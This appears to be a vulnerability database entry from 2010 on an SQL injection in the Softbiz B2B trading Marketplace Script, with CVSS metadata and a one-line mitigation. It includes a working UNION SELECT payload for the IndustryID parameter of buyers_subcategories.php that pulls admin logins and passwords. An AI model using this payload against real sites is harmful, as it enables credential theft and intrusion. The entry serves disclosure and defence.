vendor:
Softbiz B2B trading Marketplace Script
by:
AnGrY BoY
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Softbiz B2B trading Marketplace Script
Affected Version From: Softbiz B2B trading Marketplace Script
Affected Version To: Softbiz B2B trading Marketplace Script
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2
2010
Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability
Softbiz B2B trading Marketplace Script is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a malicious SQL query to the buyers_subcategories.php page with the IndustryID parameter. For example, http://localhost/path/buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin-- can be used to extract sensitive information from the database.
Mitigation:
Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.